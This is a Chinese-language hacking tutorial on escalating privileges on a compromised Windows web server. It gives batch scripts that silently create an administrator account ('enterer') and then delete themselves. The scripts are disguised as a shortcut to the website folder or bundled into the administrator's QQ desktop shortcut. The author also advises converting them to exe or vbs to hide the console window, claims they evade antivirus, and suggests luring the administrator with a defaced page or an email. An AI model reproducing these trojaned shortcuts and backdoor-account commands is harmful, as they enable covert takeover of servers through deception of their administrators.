新建一个temp.bat，内容
@echo off
net user enterer 123456 /add & net localgroup administrators enterer /add
start c:\wwwroot
attrib "c:\wwwroot" -h -s
del c:\php\temp.bat
del c:\ wwwroot.lnk
exit
意思是在运行一个快捷方式的时候添加账号并且打开网站的文件夹，最后把文件夹的隐藏属性去掉并且删除自己。
这个是默认运行在C:\php里的temp.bat 打开的网站文件夹是c:\wwwroot可以根据现实进行修改

点击temp.bat的右键选择建立快捷方式，把快捷方式放在网站一样的文件夹或者前一个文件夹。当你主动提权失败的时候就可以用这个方法了，可以挂黑页或者发email给管理员。管理员登陆服务器的时候，访问我们的快捷方式（他以为是网站的目录），此时就可以提权成功了。
这里给的是一种思路，不要问怎么把网站文件夹隐藏，怎么去掉快捷方式的箭头等等。因为用快捷方式会闪现一个CMD窗口，可以考虑把快捷方式改成exe文件（就不会有箭头，但是有后缀），把运行的bat改成exe或者vbs等，使CMD窗口不显现（具体可以用bat2exe等工具）。
或者你有权限修改桌面快捷方式，那就不担心箭头问题了。把管理员可能经常用的程序，如QQ等快捷方式修改成指向可以运行提权命令并可以运行QQ的bat文件。例如
@echo off
net user enterer 123456 /add & net localgroup administrators enterer /add
start c:\qq\qq.exe
exit
这个也算变相的捆绑了，不过绝对是免杀的。命令可以是加账号或者开3389，运行telnet服务等。怎么诱导管理员点击就是大家的问题了。
文章都是字可能大家不太习惯，希望大家有耐心看完，虽然这样提权的机会比较小，但是作为一种思路吧。